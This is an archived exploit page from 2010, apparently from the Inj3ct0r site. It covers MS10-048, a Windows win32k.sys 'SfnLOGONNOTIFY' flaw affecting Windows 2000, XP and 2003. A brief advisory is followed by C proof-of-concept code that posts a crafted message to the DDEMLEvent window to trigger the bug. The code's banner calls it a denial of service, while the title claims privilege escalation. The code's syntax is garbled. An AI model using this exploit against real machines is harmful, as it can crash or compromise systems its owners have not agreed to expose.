MS Windows 'SfnLOGONNOTIFY' Local Privilege Escala
Posted on 10 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MS Windows 'SfnLOGONNOTIFY' Local Privilege Escalation (MS10-048)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================================== Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation (MS10-048) ======================================================================== Microsoft Windows is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition. Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue. # Include "stdafx.h" # Include "windows.h" int main (int argc, char * argv []) ( printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln By MJ0011 th_decoder@126.com PressEnter"); getchar(); HWND hwnd = FindWindow ("DDEMLEvent", NULL); if (hwnd == 0) ( printf ("cannot find DDEMLEvent Window! n"); return 0; ) PostMessage (hwnd, 0x4c, 0x4, 0x80000000); return 0; ) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>